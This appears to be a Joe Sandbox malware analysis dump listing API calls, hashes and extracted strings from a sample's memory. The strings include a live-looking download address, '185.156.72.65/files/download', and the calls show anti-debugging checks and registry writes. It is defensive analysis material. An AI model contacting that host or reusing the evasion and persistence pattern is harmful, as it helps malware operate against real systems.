                      • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04952AA0), ref: 0495D142
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04952AA0), ref: 0495D14C
                      • UnhandledExceptionFilter.KERNEL32(0495277A,?,?,?,?,?,04952AA0), ref: 0495D159
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction ID: c2750cbfe8e65d27d420d393e087f44d5dc05252f40ce80360e105cbb7549b49
                      • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction Fuzzy Hash: 1C31CA749012289BCB21DF64DC897CCB7B8BF48310F6081EAE80CA7260E7709F858F44
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,DE4EB787), ref: 00410837
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1518329722-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: NTDL$e((y
                      • API String ID: 0-2475185381
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04965990,?,?,00000008,?,?,0496C8F1,00000000), ref: 04965BC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0495A30B), ref: 0495A98C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: &q?u
                      • API String ID: 0-2308932118
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4i;_
                      • API String ID: 0-3731743512
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: @x
                      • API String ID: 0-4114048967
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                      • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                      • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                      Strings
                      • kernel32.dll, xrefs: 00409C00
                      • WakeAllConditionVariable, xrefs: 00409C1D
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                      • SleepConditionVariableCS, xrefs: 00409C11
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 2565136772-3242537097
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                      • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                      • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                      • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0495C081
                      • ___TypeMatch.LIBVCRUNTIME ref: 0495C18F
                      • _UnwindNestedFrames.LIBCMT ref: 0495C2E1
                      • CallUnexpected.LIBVCRUNTIME ref: 0495C2FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
APIs
• RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
• Sleep.KERNEL32(000003E8), ref: 00405AB0
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CloseCreateOpenSleepValue
• String ID: 185.156.72.65$185.156.72.65$mixone
• API String ID: 4111408922-485810328
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04959E22), ref: 04959E50
• GetModuleHandleW.KERNEL32(0041FFC8,?,?,04959E22), ref: 04959E5B
• GetModuleHandleW.KERNEL32(0042000C,?,?,04959E22), ref: 04959E6C
• GetProcAddress.KERNEL32(00000000,00420028), ref: 04959E7E
• GetProcAddress.KERNEL32(00000000,00420044), ref: 04959E8C
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04959E22), ref: 04959EAF
• RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04959ECB
• CloseHandle.KERNEL32(0042D060,?,?,04959E22), ref: 04959EDB
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
• String ID:
• API String ID: 2565136772-0
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00401605
  • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
• Concurrency::cancel_current_task.LIBCPMT ref: 00401787
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
• String ID: 185.156.72.65$string too long
• API String ID: 2123813255-2459586365
APIs
• _ValidateLocalCookies.LIBCMT ref: 0040B837
• ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
• _ValidateLocalCookies.LIBCMT ref: 0040B8C8
• __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
• _ValidateLocalCookies.LIBCMT ref: 0040B948
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
• FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
APIs
• GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
• SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,0495BC22,0495B1C6,0495A9D7), ref: 0495BC39
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0495BC47
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0495BC60
• SetLastError.KERNEL32(00000000,0495BC22,0495B1C6,0495A9D7), ref: 0495BCB2
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 0495186C
  • Part of subcall function 04959AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04959AF5
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518A2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518D9
• Concurrency::cancel_current_task.LIBCPMT ref: 049519EE
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
• String ID: 185.156.72.65
• API String ID: 2123813255-1765470537
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DE4EB787,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
• FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• __alloca_probe_16.LIBCMT ref: 004150D5
• __alloca_probe_16.LIBCMT ref: 0041519E
• __freea.LIBCMT ref: 00415205
  • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
• __freea.LIBCMT ref: 00415218
• __freea.LIBCMT ref: 00415225
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 04952D5F
• GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04952D74
• FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04952D82
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04952D9D
• OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04952DBC
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
• String ID:
• API String ID: 2509773233-0
APIs
  • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
  • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
• __Init_thread_footer.LIBCMT ref: 004013BB
  • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
  • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
  • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
• String ID: 185.156.72.65/files/download$BAOJ$JAY@
• API String ID: 2296764815-3011832937
APIs
  • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
  • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
• __Init_thread_footer.LIBCMT ref: 04951622
  • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
  • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer
• String ID: 185.156.72.65/files/download$BAOJ$JAY@
• API String ID: 4132704954-3011832937
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
• GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
APIs
• GetConsoleOutputCP.KERNEL32(DE4EB787,00000000,00000000,00000000), ref: 0041972F
  • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
• GetLastError.KERNEL32 ref: 00419A6A
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
APIs
• GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04969996
  • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04969BE8
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04969C2E
• GetLastError.KERNEL32 ref: 04969CD1
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
APIs
• InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04951C6C
• InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04951C8F
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: FileInternet$PointerRead
• String ID:
• API String ID: 3197321146-0
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
APIs
  • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
• GetLastError.KERNEL32 ref: 00417548
• __dosmaperr.LIBCMT ref: 0041754F
• GetLastError.KERNEL32(?,?,?,?), ref: 00417589
• __dosmaperr.LIBCMT ref: 00417590
Memory Dump Source
• Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
APIs
  • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
• GetLastError.KERNEL32 ref: 049677AF
• __dosmaperr.LIBCMT ref: 049677B6
• GetLastError.KERNEL32(?,?,?,?), ref: 049677F0
• __dosmaperr.LIBCMT ref: 049677F7
Memory Dump Source
• Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4950000_file.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: df6395ff5d616979d49be4c64c05c387649a92e6d41db2ca51b23fd16f764d07
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: E6218E71204205AFAB20EF659C8197AB7AEEF842A87108935F91BDB160E730FC4087A0
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                      Memory Dump Source
